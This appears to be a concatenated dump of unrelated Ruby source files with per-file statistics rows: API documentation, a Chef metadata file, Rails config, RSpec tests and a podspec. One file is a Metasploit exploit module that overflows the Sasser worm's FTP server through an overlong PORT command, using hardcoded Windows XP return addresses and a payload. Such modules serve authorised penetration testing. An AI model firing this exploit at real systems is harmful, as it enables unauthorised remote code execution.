# * `NAME` is a sequence of non-blank printable ASCII characters not
# containing `{` or `}`.
# * `1` represents a unitary [dimensionless
# unit](https://en.wikipedia.org/wiki/Dimensionless_quantity) of 1, such
# as in `1/s`. It is typically used when none of the basic units are
# appropriate. For example, "new users per day" can be represented as
# `1/d` or `{new-users}/d` (and a metric value `5` would mean "5 new
# users). Alternatively, "thousands of page views per day" would be
# represented as `1000/d` or `k1/d` or `k{page_views}/d` (and a metric
# value of `5.3` would mean "5300 page views per day").
# * `%` represents dimensionless value of 1/100, and annotates values giving
# a percentage (so the metric values are typically in the range of 0..100,
# and a metric value `3` means "3 percent").
# * `10^2.%` indicates a metric contains a ratio, typically in the range
# 0..1, that will be multiplied by 100 and displayed as a percentage
# (so a metric value `0.03` means "3 percent").
# @!attribute [rw] description
# @return [String]
# A detailed description of the metric, which can be used in documentation.
# @!attribute [rw] display_name
# @return [String]
# A concise name for the metric, which can be displayed in user interfaces.
# Use sentence case without an ending period, for example "Request count".
# This field is optional but it is recommended to be set for any metrics
# associated with user-visible concepts, such as Quota.
# @!attribute [rw] metadata
# @return [Google::Api::MetricDescriptor::MetricDescriptorMetadata]
# Optional. Metadata which can be used to guide usage of the metric.
# @!attribute [rw] launch_stage
# @return [Google::Api::LaunchStage]
# Optional. The launch stage of the metric definition.
class MetricDescriptor
# Additional annotations that can be used to guide the usage of a metric.
# @!attribute [rw] launch_stage
# @return [Google::Api::LaunchStage]
# Deprecated. Please use the MetricDescriptor.launch_stage instead.
# The launch stage of the metric definition.
# @!attribute [rw] sample_period
# @return [Google::Protobuf::Duration]
# The sampling period of metric data points. For metrics which are written
# periodically, consecutive data points are stored at this time interval,
# excluding data loss due to errors. Metrics with a higher granularity have
# a smaller sampling period.
# @!attribute [rw] ingest_delay
# @return [Google::Protobuf::Duration]
# The delay of data points caused by ingestion. Data points older than this
# age are guaranteed to be ingested and available to be read, excluding
# data loss due to errors.
class MetricDescriptorMetadata; end
# The kind of measurement. It describes how the data is reported.
module MetricKind
# Do not use this default value.
METRIC_KIND_UNSPECIFIED = 0
# An instantaneous measurement of a value.
GAUGE = 1
# The change in a value during a time interval.
DELTA = 2
# A value accumulated over a time interval. Cumulative
# measurements in a time series should have the same start time
# and increasing end times, until an event resets the cumulative
# value to zero and sets a new start time for the following
# points.
CUMULATIVE = 3
end
# The value type of a metric.
module ValueType
# Do not use this default value.
VALUE_TYPE_UNSPECIFIED = 0
# The value is a boolean.
# This value type can be used only if the metric kind is `GAUGE`.
BOOL = 1
# The value is a signed 64-bit integer.
INT64 = 2
# The value is a double precision floating point number.
DOUBLE = 3
# The value is a text string.
# This value type can be used only if the metric kind is `GAUGE`.
STRING = 4
# The value is a {Google::Api::Distribution `Distribution`}.
DISTRIBUTION = 5
# The value is money.
MONEY = 6
end
end
# A specific metric, identified by specifying values for all of the
# labels of a {Google::Api::MetricDescriptor `MetricDescriptor`}.
# @!attribute [rw] type
# @return [String]
# An existing metric type, see {Google::Api::MetricDescriptor}.
# For example, `custom.googleapis.com/invoice/paid/amount`.
# @!attribute [rw] labels
# @return [Hash{String => String}]
# The set of label values that uniquely identify this metric. All
# labels listed in the `MetricDescriptor` must be assigned values.
class Metric; end
end
end | 44.730612 | 85 | 0.598777 |
18baf9b50f98897aea092e7d3e3a0f8ee1ff9639 | 484 | name 'generated_cookbook'
maintainer 'Copyright Holder'
maintainer_email '[email protected]'
license 'Apache-2.0'
description 'Installs / configures generated_cookbook'
long_description ::File.read(File.expand_path('../README.md', __FILE__))
version '0.1.0'
chef_version '>= 12'
# issues_url 'https://github.com/<insert_org_here>/generated_cookbook/issues'
# source_url 'https://github.com/<insert_org_here>/generated_cookbook'
| 44 | 83 | 0.698347 |
616676080a6a24fecbbe98998865be12b300e3bb | 303 | require 'euchre'
# choose trump
puts %w{Diamonds Clubs Spades Hearts}[rand(4)]
ed = EuchreDeck.new
ed.shuffle
5.times{ puts ed.deal }
And the sort program as:
require 'euchre'
eh = EuchreHand.new
eh.trump = gets.strip
while card = gets
eh.add_card( card.strip )
end
puts eh.trump
puts eh.hand
| 12.625 | 46 | 0.719472 |
011f25115462bc48608b3e0a028d1543879316a8 | 372 | # -*- encoding: ascii-8bit -*-
require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../shared/cover_and_include', __FILE__)
require File.expand_path('../shared/cover', __FILE__)
ruby_version_is "1.8.8" do
describe "Range#cover?" do
it_behaves_like :range_cover_and_include, :cover?
it_behaves_like :range_cover, :cover?
end
end | 33.818182 | 65 | 0.731183 |
4a5556ab0b4f240e4d4bb4fe0473172cba0723f0 | 2,161 | # frozen_string_literal: true
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
# Run rails dev:cache to toggle caching.
if Rails.root.join('tmp', 'caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{2.days.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
config.action_mailer.default_url_options = { host: 'configcube.pdev', port: 80 }
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Highlight code that triggered database queries in logs.
config.active_record.verbose_query_logs = true
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 34.301587 | 85 | 0.761222 |
7993e31d4c42a3ab2a5e7502f7f2f1eeb71d58ff | 1,867 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Sasser Worm avserve FTP PORT Buffer Overflow',
'Description' => %q{
This module exploits the FTP server component of the Sasser worm.
By sending an overly long PORT command the stack can be overwritten.
},
'Author' => [ '<valsmith[at]metasploit.com>', '<chamuco[at]gmail.com>', 'patrick' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '6197'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => ['win'],
'Privileged' => false,
'Payload' =>
{
'Space' => 480,
'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows XP SP0', { 'Ret' => 0x71aa32ad } ], #p/p/r ws2help.dll
[ 'Windows XP SP1', { 'Ret' => 0x77e7633a } ], #p/p/r
],
'DisclosureDate' => 'May 10 2004',
'DefaultTarget' => 1))
register_options(
[
Opt::RPORT(5554),
], self.class)
end
def exploit
connect
print_status("Trying target #{target.name}...")
sploit = make_nops(267) + Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target['Ret']].pack('V')
sploit << Rex::Arch::X86.jmp(0xfffffc13) + make_nops(15) + payload.encoded + make_nops(1530)
send_cmd( ['PORT', sploit] , false)
handler
disconnect
end
end
| 27.455882 | 101 | 0.534012 |
bb58ebea673f7fb0b97a021f55758b59cc4c2a96 | 3,815 | RSpec.describe EventSourcery::EventProcessing::ErrorHandlers::ExponentialBackoffRetry do
subject(:error_handler) do
described_class.new(
processor_name: processor_name,
)
end
let(:processor_name) { 'processor_name' }
let(:on_event_processor_error) { spy }
let(:logger) { spy(Logger) }
before do
@sleep_intervals = []
allow(EventSourcery.config).to receive(:on_event_processor_error).and_return(on_event_processor_error)
allow(EventSourcery).to receive(:logger).and_return(logger)
allow(logger).to receive(:error)
allow(error_handler).to receive(:sleep) { |interval| @sleep_intervals << interval }
end
describe '#with_error_handling' do
let(:event_processor) { double :event_processor }
let(:cause) { double(to_s: 'OriginalError', backtrace: ['back', 'trace']) }
let(:event) { double(uuid: SecureRandom.uuid) }
let(:number_of_errors_to_raise) { 3 }
subject(:with_error_handling) do
@count = 0
error_handler.with_error_handling do
@count +=1
raise error if @count <= number_of_errors_to_raise
end
end
context 'when the raised error is StandardError' do
before do
allow(error).to receive(:cause).and_return(cause)
with_error_handling
end
let(:error) { StandardError.new('Some error') }
it 'logs the errors' do
expect(logger).to have_received(:error).thrice
end
it 'calls on_event_processor_error with error and processor name' do
expect(on_event_processor_error).to have_received(:call).thrice.with(error, processor_name)
end
it 'sleeps the process at default interval' do
expect(@sleep_intervals).to eq [1, 1, 1]
end
end
context 'when the raised errors are EventProcessingError for the same event' do
before do
allow(error).to receive(:cause).and_return(cause)
with_error_handling
end
let(:error) { EventSourcery::EventProcessingError.new(event: event, processor: event_processor) }
it 'logs the original error' do
expect(logger).to have_received(:error).thrice.with("Processor #{processor_name} died with OriginalError.\nback\ntrace")
end
it 'calls on_event_processor_error with error and processor name' do
expect(on_event_processor_error).to have_received(:call).thrice.with(cause, processor_name)
end
it 'sleeps the process at exponential increasing intervals' do
expect(@sleep_intervals).to eq [1, 2, 4]
end
context 'when lots of errors are raised for the same event' do
let(:number_of_errors_to_raise) { 10 }
it 'sleeps the process at exponential increasing intervals' do
expect(@sleep_intervals).to eq [1, 2, 4, 8, 16, 32, 64, 64, 64, 64]
end
end
end
context 'when the raised errors are EventProcessingError for the different events' do
before do
allow(error_for_event).to receive(:cause).and_return(cause)
allow(error_for_another_event).to receive(:cause).and_return(cause)
with_error_handling
end
let(:error_for_event) { EventSourcery::EventProcessingError.new(event: event, processor: event_processor) }
let(:another_event) { double(uuid: SecureRandom.uuid) }
let(:error_for_another_event) { EventSourcery::EventProcessingError.new(event: another_event, processor: event_processor) }
subject(:with_error_handling) do
@count = 0
error_handler.with_error_handling do
@count +=1
raise error_for_event if @count <= 3
raise error_for_another_event if @count <= 5
end
end
it 'resets retry interval when event uuid changes' do
expect(@sleep_intervals).to eq [1, 2, 4, 1, 2]
end
end
end
end
| 35.990566 | 129 | 0.683617 |
08569a130778ad94c2eb25c0db9c0f8c34411c9c | 619 | require "serverspec"
require "docker"
describe "Dockerfile" do
before(:all) do
image = Docker::Image.build_from_dir('/docker-file/.')
set :os, family: :debian
set :backend, :docker
set :docker_image, image.id
end
describe file('/usr/share/jenkins/ref/') do
it { should be_directory }
end
describe file('/usr/share/jenkins/ref/init.groovy.d/') do
it { should be_directory }
end
describe file('/usr/share/jenkins/ref/adop_scripts/') do
it { should be_directory }
end
describe file('/usr/share/jenkins/ref/adop_scripts/') do
it { should be_owned_by 'root' }
end
end
| 19.967742 | 59 | 0.678514 |
5dcf86028dbeefef55b483ea20e8819df168cbc9 | 780 | Pod::Spec.new do |s|
s.name = "ReYunTracking"
s.version = "1.3.3"
s.summary = "ReYun Tracking SDK"
s.homepage = "https://github.com/ReYunTracking/Tracking"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "feiyang" => "[email protected]" }
s.platform = :ios
s.ios.deployment_target = "8.0"
s.source = { :git => "https://github.com/ReYunTracking/Tracking.git", :tag => s.version }
s.source_files = 'Tracking/*.h'
s.preserve_paths = 'Tracking/*.a'
s.xcconfig = { 'LIBRARY_SEARCH_PATHS' => '"$(PODS_ROOT)/ReYunTracking/Tracking/**"' }
s.frameworks = 'SystemConfiguration','AdSupport','CoreTelephony','Security','CoreMotion'
s.libraries = 'sqlite3','ReYunTracking'
end
| 26.896552 | 98 | 0.598718 |
e8afc7fa386442e44261860c069b327f0493e60d | 23,426 | # frozen_string_literal: true
require_relative '../test_helper'
SingleCov.covered! uncovered: 4
describe Stage do
subject { stages(:test_staging) }
let(:stage) { subject }
it "#unique_name" do
assert_equal "Foo / Staging", stage.unique_name
end
describe "validations" do
it "is valid" do
assert_valid stage
end
it "is valid with 1 email" do
stage.notify_email_address = '[email protected]'
assert_valid stage
end
it "is invalid with email that contains spaces" do
stage.notify_email_address = 'fo [email protected]'
refute_valid stage
end
it "is valid with trailing semicolon email" do
stage.notify_email_address = '[email protected]; '
assert_valid stage
end
it "is invalid with weird emails" do
stage.notify_email_address = 'sdfsfdfsd'
refute_valid stage
end
it "is invalid with valid followed by invalid email" do
stage.notify_email_address = 'foo@bar;sfdsdf;'
refute_valid stage
end
it "is invalid with invalid followed by valid email" do
stage.notify_email_address = 'sfdsdf;foo@bar'
refute_valid stage
end
it "is valid with multiple valid emails" do
stage.notify_email_address = 'foo@bar;bar@foo'
assert_valid stage
end
end
describe ".where_reference_being_deployed" do
it "returns stages where the reference is currently being deployed" do
project = projects(:test)
stage = stages(:test_staging)
author = users(:deployer)
job = project.jobs.create!(user: author, commit: "a", command: "yes", status: "running")
stage.deploys.create!(reference: "xyz", job: job, project: project)
assert_equal [stage], Stage.where_reference_being_deployed("xyz")
end
end
describe ".deployed_on_release" do
it "returns stages with deploy_on_release" do
stage.update_column(:deploy_on_release, true)
Stage.deployed_on_release.must_equal [stage]
end
end
describe '.reset_order' do
let(:project) { projects(:test) }
let(:stage1) { Stage.create!(project: project, name: 'stage1', order: 1) }
let(:stage2) { Stage.create!(project: project, name: 'stage2', order: 2) }
let(:stage3) { Stage.create!(project: project, name: 'stage3', order: 3) }
it 'updates the order on stages' do
Stage.reset_order [stage3.id, stage2.id, stage1.id]
stage1.reload.order.must_equal 2
stage2.reload.order.must_equal 1
stage3.reload.order.must_equal 0
end
it 'succeeds even if a stages points to a deleted stage' do
stage3.soft_delete!(validate: false)
stage1.update! next_stage_ids: [stage3.id]
Stage.reset_order [stage2.id, stage1.id]
stage1.reload.order.must_equal 1
stage2.reload.order.must_equal 0
end
end
describe '#last_deploy' do
let(:project) { projects(:test) }
let(:stage) { stages(:test_staging) }
it 'caches nil' do
stage
ActiveRecord::Relation.any_instance.expects(:first).returns nil
stage.last_deploy.must_be_nil
ActiveRecord::Relation.any_instance.expects(:first).never
stage.last_deploy.must_be_nil
end
it 'returns the last deploy for the stage' do
job = project.jobs.create!(command: 'cat foo', user: users(:deployer), status: 'succeeded')
stage.deploys.create!(reference: 'master', job: job, project: project)
job = project.jobs.create!(command: 'cat foo', user: users(:deployer), status: 'failed')
deploy = stage.deploys.create!(reference: 'master', job: job, project: project)
assert_equal deploy, stage.last_deploy
end
end
describe '#last_successful_deploy' do
let(:project) { projects(:test) }
it 'caches nil' do
subject
ActiveRecord::Relation.any_instance.expects(:first).returns nil
stage.last_successful_deploy.must_be_nil
ActiveRecord::Relation.any_instance.expects(:first).never
stage.last_successful_deploy.must_be_nil
end
it 'returns the last successful deploy for the stage' do
successful_job = project.jobs.create!(command: 'cat foo', user: users(:deployer), status: 'succeeded')
stage.deploys.create!(reference: 'master', job: successful_job, project: project)
project.jobs.create!(command: 'cat foo', user: users(:deployer), status: 'failed')
deploy = stage.deploys.create!(reference: 'master', job: successful_job, project: project)
assert_equal deploy, stage.last_successful_deploy
end
end
describe "#create_deploy" do
let(:user) { users(:deployer) }
it "creates a new deploy" do
deploy = subject.create_deploy(user, reference: "foo")
deploy.reference.must_equal "foo"
deploy.release.must_equal true
end
it "creates a new job" do
deploy = subject.create_deploy(user, reference: "foo")
deploy.job.commit.must_equal "foo"
deploy.job.user.must_equal user
end
it "creates neither job nor deploy if one fails to save" do
assert_no_difference "Deploy.count + Job.count" do
subject.create_deploy(user, reference: "")
end
end
it "creates a no-release deploy when stage was configured to not deploy code" do
subject.no_code_deployed = true
deploy = subject.create_deploy(user, reference: "foo")
deploy.release.must_equal false
end
end
describe "#active_deploy" do
it "is nil when not deploying" do
subject.active_deploy.must_be_nil
end
it 'caches nil' do
subject
ActiveRecord::Relation.any_instance.expects(:first).returns nil
subject.active_deploy.must_be_nil
ActiveRecord::Relation.any_instance.expects(:first).never
subject.active_deploy.must_be_nil
end
it "is there when deploying" do
subject.deploys.first.job.update_column(:status, 'running')
subject.active_deploy.must_equal subject.deploys.first
end
it "is there when waiting for buddy" do
subject.deploys.first.job.update_column(:status, 'pending')
subject.active_deploy.must_equal subject.deploys.first
end
end
describe "#notify_email_addresses" do
it "returns email addresses separated by a semicolon" do
stage = Stage.new(notify_email_address: "[email protected];[email protected] ; [email protected]; ")
stage.notify_email_addresses.must_equal ["[email protected]", "[email protected]", "[email protected]"]
end
it "ignores whitespace" do
stage = Stage.new(notify_email_address: " ")
stage.notify_email_addresses.must_equal []
end
end
describe "#next_stage" do
let(:project) { Project.new }
let(:stage1) { Stage.new(project: project) }
let(:stage2) { Stage.new(project: project) }
before do
project.stages = [stage1, stage2]
end
it "returns the next stage of the project" do
stage1.next_stage.must_equal stage2
end
it "returns nil if the current stage is the last stage" do
stage2.next_stage.must_be_nil
end
end
describe "#automated_failure_emails" do
let(:user) { users(:super_admin) }
let(:deploy) do
deploy = subject.create_deploy(user, reference: "commita")
deploy.job.failed!
deploy
end
let(:previous_deploy) { deploys(:succeeded_test) }
let(:emails) { subject.automated_failure_emails(deploy) }
let(:simple_response) { Hashie::Mash.new(commits: [{commit: {author: {email: "[email protected]"}}}]) }
before do
user.update_attribute(:integration, true)
subject.update_column(:static_emails_on_automated_deploy_failure, "[email protected]")
subject.update_column(:email_committers_on_automated_deploy_failure, true)
deploys(:failed_staging_test).destroy # this fixture confuses these tests.
end
it "includes static emails and committer emails" do
GITHUB.expects(:compare).with(anything, previous_deploy.job.commit, "commita").returns simple_response
emails.must_equal ["[email protected]", "[email protected]"]
end
it "is empty when deploy was a success" do
deploy.job.succeeded!
emails.must_be_nil
end
it "is empty when last deploy was also a failure" do
previous_deploy.job.failed!
emails.must_be_nil
end
it "is empty when user was human" do
user.update_attribute(:integration, false)
emails.must_be_nil
end
it "includes committers when there is no previous deploy" do
previous_deploy.delete
emails.must_equal ["[email protected]"]
end
it "does not include commiiters if the author did not have a email" do
GITHUB.expects(:compare).returns Hashie::Mash.new(commits: [{commit: {author: {}}}])
emails.must_equal ["[email protected]"]
end
it "does not include commiiters when email_committers_on_automated_deploy_failure? if off" do
subject.update_column(:email_committers_on_automated_deploy_failure, false)
emails.must_equal ["[email protected]"]
end
it "does not have static when static is empty" do
subject.update_column(:static_emails_on_automated_deploy_failure, "")
GITHUB.expects(:compare).returns simple_response
emails.must_equal ["[email protected]"]
end
end
describe ".build_clone" do
def clone_diff
stage_attributes = stage.attributes
cloned.attributes.map { |k, v| [k, stage_attributes[k], v] unless stage_attributes[k] == v }.compact
end
let(:stage) { stages(:test_staging) }
let(:cloned) { Stage.build_clone(stage) }
it "returns an unsaved copy of the given stage" do
clone_diff.must_equal(
[
["id", stage.id, nil],
["is_template", true, false],
["template_stage_id", nil, stage.id]
]
)
end
it "copies associations" do
stage.flowdock_flows = [FlowdockFlow.new(name: "test", token: "abcxyz", stage_id: subject.id)]
cloned.flowdock_flows.size.must_equal 1
end
it "does not copy deploy pipeline since that would result in duplicate deploys" do
stage.next_stage_ids = [stages(:test_production).id]
cloned.next_stage_ids.must_equal []
end
end
describe '#production?' do
let(:stage) { stages(:test_production) }
before { DeployGroup.stubs(enabled?: true) }
it 'is true for stage with production deploy_group' do
stage.update!(production: false)
stage.production?.must_equal true
end
it 'is false for stage with non-production deploy_group' do
stage = stages(:test_staging)
stage.production?.must_equal false
end
it 'false for stage with no deploy_group' do
stage.update!(production: false)
stage.deploy_groups = []
stage.production?.must_equal false
end
it 'fallbacks to production field when deploy groups was enabled without selecting deploy groups' do
stage.deploy_groups = []
stage.production = true
stage.production?.must_equal true
stage.production = false
stage.production?.must_equal false
end
it 'fallbacks to production field when deploy groups was disabled' do
DeployGroup.stubs(enabled?: false)
stage.update!(production: true)
stage.production?.must_equal true
stage.update!(production: false)
stage.production?.must_equal false
end
end
describe "#deploy_requires_approval?" do
before do
BuddyCheck.stubs(enabled?: true)
stage.production = true
end
it "requires approval with buddy-check + deploying + production" do
assert stage.deploy_requires_approval?
end
it "does not require approval when buddy check is disabled" do
BuddyCheck.unstub(:enabled?)
refute stage.deploy_requires_approval?
end
it "does not require approval when not in production" do
stage.production = false
refute stage.deploy_requires_approval?
end
it "does not require approval when not deploying code" do
stage.no_code_deployed = true
refute stage.deploy_requires_approval?
end
end
describe '#deploy_group_names' do
let(:stage) { stages(:test_production) }
it 'returns array when DeployGroup enabled' do
DeployGroup.stubs(enabled?: true)
stage.deploy_group_names.must_equal ['Pod1', 'Pod2']
end
it 'returns empty array when DeployGroup disabled' do
DeployGroup.stubs(enabled?: false)
stage.deploy_group_names.must_equal []
end
end
describe '#save' do
it 'touches the stage and project when only changing deploy_groups for cache invalidation' do
stage.update_column(:updated_at, 1.minutes.ago)
stage.project.update_column(:updated_at, 1.minutes.ago)
stage.deploy_groups << deploy_groups(:pod1)
stage.save
stage.updated_at.must_be :>, 2.seconds.ago
stage.project.updated_at.must_be :>, 2.seconds.ago
end
end
describe "#ensure_ordering" do
it "puts new stages to the back" do
new = stage.project.stages.create! name: 'Newish'
new.order.must_equal 3
end
end
describe "#destroy" do
it "soft deletes all it's StageCommand" do
Stage.with_deleted do
assert_difference "StageCommand.count", -1 do
stage.soft_delete!(validate: false)
end
assert_difference "StageCommand.count", +1 do
stage.soft_undelete!
end
end
end
end
describe '#script' do
it 'joins all commands based on position' do
command = Command.create!(command: 'test')
stage.command_ids = [command.id, commands(:echo).id]
stage.save!
stage.reload
stage.script.must_equal "test\n#{commands(:echo).command}"
end
it 'is empty without commands' do
stage.command_ids = []
stage.script.must_equal ""
end
end
describe '#command_ids=' do
let!(:sample_commands) do
['foo', 'bar', 'baz'].map { |c| Command.create!(command: c) }
end
before do
StageCommand.delete_all
stage.command_ids = sample_commands.map(&:id)
stage.script.must_equal "foo\nbar\nbaz"
end
it "can reorder" do
stage.command_ids = sample_commands.map(&:id).reverse
stage.save!
stage.script.must_equal "baz\nbar\nfoo"
stage.reload
stage.script.must_equal "baz\nbar\nfoo"
stage.send(:stage_commands).sort_by(&:id).map(&:position).must_equal [2, 1, 0]
end
it "ignores blanks" do
stage.command_ids = ['', nil, ' '] + sample_commands.map(&:id).reverse
stage.save!
stage.script.must_equal "baz\nbar\nfoo"
stage.reload
stage.script.must_equal "baz\nbar\nfoo"
stage.send(:stage_commands).sort_by(&:id).map(&:position).must_equal [2, 1, 0]
end
it "can add new stage commands" do
stage.command_ids = ([commands(:echo)] + sample_commands).map(&:id)
stage.save!
stage.script.must_equal "echo hello\nfoo\nbar\nbaz"
stage.reload
stage.script.must_equal "echo hello\nfoo\nbar\nbaz"
stage.send(:stage_commands).sort_by(&:id).map(&:position).must_equal [1, 2, 3, 0] # kept the old and added one new
end
it 'can add new commands' do
StageCommand.delete_all
stage.command_ids = ['echo newcommand']
stage.save!
stage.script.must_equal 'echo newcommand'
end
end
describe "auditing" do
it "tracks important changes" do
stage.update_attributes!(name: "Foo")
stage.audits.size.must_equal 1
stage.audits.first.audited_changes.must_equal "name" => ["Staging", "Foo"]
end
it "ignores unimportant changes" do
stage.update_attributes(order: 5, updated_at: 1.second.from_now)
stage.audits.size.must_equal 0
end
it "tracks selecting an existing command" do
old = stage.command_ids
new = old + [commands(:global).id]
stage.update_attributes!(command_ids: new)
stage.audits.size.must_equal 1
stage.audits.first.audited_changes.must_equal "script" => ["echo hello", "echo hello\necho global"]
end
it "does not track when commands do not change" do
stage.update_attributes!(command_ids: stage.command_ids.map(&:to_s))
stage.audits.size.must_equal 0
end
it "tracks command removal" do
stage.update_attributes!(command_ids: [])
stage.audits.size.must_equal 1
stage.audits.first.audited_changes.must_equal "script" => ["echo hello", ""]
end
it "tracks command_ids reorder" do
stage.send(:stage_commands).create!(command: commands(:global), position: 1)
stage.update_attributes!(command_ids: stage.command_ids.reverse)
stage.audits.size.must_equal 1
stage.audits.first.audited_changes.must_equal(
"script" => ["echo hello\necho global", "echo global\necho hello"]
)
end
it "does not trigger multiple times when destroying" do
stage.destroy!
stage.audits.size.must_equal 1
end
it "does not trigger multiple times when creating" do
stage = Stage.create!(name: 'Foobar', project: projects(:test), command_ids: Command.pluck(:id))
stage.audits.size.must_equal 1
end
end
describe "#destroy_deploy_groups_stages" do
it 'deletes deploy_groups_stages on destroy' do
assert_difference 'DeployGroupsStage.count', -1 do
stage.destroy!
end
end
end
describe "#influencing_stage_ids" do
let(:other) { stages(:test_production) }
it "finds self when there are none" do
stage.influencing_stage_ids.must_equal [stage.id]
end
describe "with other stage" do
before { DeployGroupsStage.create!(stage: other, deploy_group: stage.deploy_groups.first) }
it "finds other stages that go to the same deploy groups" do
stage.influencing_stage_ids.sort.must_equal [stage.id, other.id].sort
end
it "does not find stages in other projects" do
other.update_column(:project_id, 123)
stage.influencing_stage_ids.sort.must_equal [stage.id]
end
it "does not list stages that prepare the deploy to avoid false-positives" do
other.update_column(:no_code_deployed, true)
stage.influencing_stage_ids.sort.must_equal [stage.id]
end
end
end
describe "template linking" do
describe "with no clones" do
it "has no parent" do
assert_nil subject.template_stage
end
it "has no clones" do
assert_empty subject.clones
end
end
describe "with one clone" do
before do
@clone = Stage.build_clone(subject)
@clone.name = "foo1"
@clone.save!
@clone.reload
end
it "has one parent" do
assert_equal subject, @clone.template_stage
end
it "has one clone" do
assert_equal [@clone], subject.clones
end
end
describe "with many clones" do
before do
@clone1 = Stage.build_clone(subject)
@clone1.name = "foo1"
@clone1.save!
@clone1.reload
@clone2 = Stage.build_clone(subject)
@clone2.name = "foo2"
@clone2.save!
@clone2.reload
@clones = [@clone1, @clone2]
end
it "has one parent" do
@clones.each do |c|
assert_equal subject, c.template_stage
end
end
it "has multiple clones" do
assert_equal @clones, subject.clones
end
end
end
describe "#validate_deploy_group_selected" do
it "is valid without deploy groups" do
stage.deploy_groups.clear
assert_valid stage
end
describe "with deploy group feature" do
before { DeployGroup.stubs(enabled?: true) }
it "is valid with deploy groups" do
assert_valid stage
end
describe "without deploy groups" do
before { stage.deploy_groups.clear }
it "is not valid" do
refute_valid stage
end
it "is valid when being the automated stage" do
stage.name = Stage::AUTOMATED_NAME
assert_valid stage
end
end
end
end
describe "#validate_not_auto_deploying_without_buddy" do
it "shows error when trying to auto-deploy without buddy" do
stage.deploy_on_release = true
stage.stubs(:deploy_requires_approval?).returns(true)
refute_valid stage
stage.errors[:deploy_on_release].must_equal ["cannot be used for a stage the requires approval"]
end
end
describe "#direct" do
before do
stage.confirm = false
stage.no_reference_selection = true
end
it "is direct" do
assert stage.direct?
end
it "is not direct when confirmation is required" do
stage.confirm = true
refute stage.direct?
end
it "is not direct when reference selection is required" do
stage.no_reference_selection = false
refute stage.direct?
end
# this could be loosened, but then we have to make sure it goes to pending and not
# into a running deploy
it "is not direct when approval is required" do
stage.stubs(deploy_requires_approval?: true)
refute stage.direct?
end
end
describe "#deployed_or_running_deploy" do
let(:deploy) { deploys(:succeeded_test) }
it "finds succeeded" do
stage.deployed_or_running_deploy.must_equal deploy
end
it "finds running" do
deploy.job.update_column(:status, 'running')
stage.deployed_or_running_deploy.must_equal deploy
end
it "ignores failed" do
deploy.job.update_column(:status, 'failed')
stage.deployed_or_running_deploy.must_be_nil
end
end
describe "#url" do
it "builds" do
stage.url.must_equal "http://www.test-url.com/projects/foo/stages/staging"
end
end
describe "#locked_by?" do
before { stage } # cache
it "returns true for self lock" do
assert_sql_queries 0 do
assert stage.locked_by?(Lock.new(resource: stage))
end
end
it "returns false for different stage's lock" do
lock = Lock.new(resource: stages(:test_production))
assert_sql_queries 0 do
refute stage.locked_by?(lock)
end
end
describe "with environments" do
before do
DeployGroup.stubs(enabled?: true)
stage # load stage
DeployGroupsStage.first # load column information
end
it "returns true if finds environment lock on stage" do
lock = Lock.new(resource: environments(:staging))
assert_sql_queries 3 do # deploy-groups -> deploy-groups-stages -> environments
assert stage.locked_by?(lock)
end
end
it "does not check environments on non-environment locks" do
assert_sql_queries 0 do
assert stage.locked_by?(Lock.new(resource: stage))
end
end
end
describe "with projects" do
it "finds project lock on stage" do
lock = Lock.new(resource: projects(:test))
assert_sql_queries 1 do
assert stage.locked_by?(lock)
end
end
end
describe "with deploy groups" do
it "is locked by own groups" do
lock = Lock.new(resource: deploy_groups(:pod100))
assert_sql_queries 2 do # deploy-groups -> deploy-groups-stages
assert stage.locked_by?(lock)
end
end
it "is not locked by other groups" do
lock = Lock.new(resource: deploy_groups(:pod1))
assert_sql_queries 2 do # deploy-groups -> deploy-groups-stages
refute stage.locked_by?(lock)
end
end
end
end
end
| 30.149292 | 120 | 0.670964 |
9101002bc2cc1bd24b07d7193f9c3d1dbb7aa6dd | 382 | require 'httparty'
class LoginHistoriesController < ApplicationController
before_action :auth_member!
layout "landing"
def index
if current_user.present?
@login_histories = LoginHistory.where(member_id: current_user.id)
.order('created_at DESC').paginate(:page => params[:page], :per_page => 10)
else
end
end
end
| 23.875 | 103 | 0.65445 |
874b7df6e5fc0a15577f4bf39f9252fe09e43af3 | 5,098 | #
# Be sure to run `pod spec lint hehe.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
s.name = "foverhehe"
